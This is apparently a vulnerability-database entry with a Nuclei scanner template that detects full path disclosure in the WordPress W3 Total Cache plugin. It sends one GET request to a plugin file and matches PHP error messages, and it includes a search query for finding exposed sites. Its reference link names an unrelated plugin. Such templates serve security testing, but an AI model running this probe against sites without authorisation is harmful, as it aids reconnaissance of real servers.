漏洞描述
WordPress W3 Total Cache plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
wp-w3-total-cache-fpd: WordPress W3 Total Cache - Full Path Disclosure
PoC代码[已公开]
id: wp-w3-total-cache-fpd
info:
name: WordPress W3 Total Cache - Full Path Disclosure
author: DhiyaneshDk
severity: low
description: |
WordPress W3 Total Cache plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
reference:
- https://wordpress.org/plugins/advanced-iframe/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/w3-total-cache"
tags: wp,wordpress,wp-plugin,fpd,w3-total-cache,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/w3-total-cache/inc/lightbox/purchase.php"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:","failed to open stream")'
- 'contains(body, "w3-total-cache")'
- 'status_code == 200 || status_code == 500'
condition: and
# digest: 4a0a00473045022004cc8358b2210977f086fe054d58e7c82f204e30c9c5d51e390549af02ad8457022100a4afe0825b04e5bc63382de0ced84d62de8491403ac3ce9b46817cb18a542fad:922c64590222798bb761d5b6d8e72950